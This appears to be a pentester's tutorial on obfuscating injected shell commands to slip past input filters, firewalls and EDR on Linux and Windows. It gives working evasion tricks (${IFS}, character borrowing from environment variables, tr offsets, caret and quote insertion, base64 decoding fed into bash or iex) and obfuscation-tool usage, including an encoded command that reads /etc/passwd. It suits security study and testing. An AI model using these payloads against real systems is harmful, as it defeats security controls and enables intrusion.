Command Obfuscation

If we haven't already learned from the news articles surrounding the humongous MoveIt data breach - injection commands can ruin lives. It's important to validate front end data entry as well as sanitize and re-validate on the back end that same data. Try not to run server side commands and instead use the functions built into the programming languages you're using instead.

If you're on the pentest side and stupid firewalls, EDR's and other good guy tools are keeping your commands or scripts from working... try these:

Sometimes just adding a ';' and then then command you want will work, other times - you'll need to obfuscate it as there's protection. There's likely to be two types of validation:

Front End: checked at the website level - If there's no new web request made then it's likely a front end validation.

Back End: checked on the server side.

Using BurpSuite or ZAP to capture the traffic, you can send it to repeater and then play. Sometimes you may want to input one character at a time, building up the full command so you can see which characters (if it's blocking characters) it's filtering.

Some Basics:

in addition to the URL-Encoded option you can use this for linux based runtimes: ${IFS} , using Brace Expansion (each command is provided with a space between them: {ls,-la}

Linux

Using echo

If you were to echo path, you would see something like this.

echo ${PATH}

/usr/local/bin:/usr/bin:/bin:/usr/games

You can then pull out specific characters by providing a starting point (0) and how many characters (1). For example say you wanted the first backslash, you could use:

echo ${PATH:0:1}

Try using printenv and picking one of the environment variables that might have a character you need to borrow.

Using ASCII Tables

This is a slick trick. We're going to use the tr command with ascii tables (man ascii). TR basically takes a set of characters and replaces them with another. For example, say we wanted uppercase to be lower case we'd use

echo $(tr '[A-Z]' '[a-z]'<<<'THIS SUCKS')

this sucks should now echo out all lower case. With that knowledge, what we're going to do is offset the ascii table by one character.

echo $(tr '!-}' '"-~'<<<[)

Ok, if you just type ascii you'll see the full ascii table. What we're doing is taking the first characters ! through to }, which you'll notice is decimal 33 through to 125. We're then going to replace any of those characters with the offset of one character, starting at " through to ~, which you'll notice is decimal 34 through 126. That's exactly one character off. We then supply the character that's one character ahead of the one we want - in this case [. What tr is going to do for us, is drop back one character and provide us with the \ character instead. This is super slick but may start looking pretty long and take a bit... unless you wanna automate it ;)

Windows:

The same idea works on Windows as well. We echo a Windows variable (via cmd, not PS)

echo %HOMEPATH%
\Users\Aldern00b

To get that backslash, we specify a starting position (~6 which starts us here: \Aldern00b) then specifying a negative end position, which in this case is the length of the username Aldern00b (-9 -> \)

echo %HOMEPATH:~6,-9%

You can do the same thing with powershell, a bit easer:

$env:HOMEPATH[0]

Try using Get-ChildItem Env: and picking one of the environment variables that might have a character you need to borrow.

Linux:

Adding $@ in the middle of commands:

who$@ami

Adding \'s in the middle of commands:

who\am\i

Using tr with camel case:

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Using the rev command to reverse the characters:

$(rev<<<'imaohw')

Base64 encode

echo -n 'cat /etc/passwd | grep 33' | base64

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

you can also change it up and use xxd encoding (hex) or some other method.

Windows:

Adding Yummy Carrots:

who^ami

Using the sub shell iex to reverse by giving it the range of characters is reverse the asking it to join those characters back together:

iex "$('imaohw'[-1..-6] -join '')"

Base 64 encode/decode

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))

iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Both:

Random quotes might get ya by, as long as they're in matching pairs: w'h'o'am'i

It's cool to know how to do all this but it's easier to use tools:

Bashfuscator (Linux):

GitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.

git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
python3 setup.py install --user
cd ./bashfuscator/bin/
./bashfuscator -h
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

We can then test it by running the command in bash

bash -c '%command%'

Dosfuscation (Windows):

GitHub - danielbohannon/Invoke-DOSfuscation: Cmd.exe Command Obfuscation Generator & Detection Test Harness

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help

If you want to test the above on your Linux box, you can install PowerShell on linux here: Install PowerShell on Linux - PowerShell | Microsoft Learn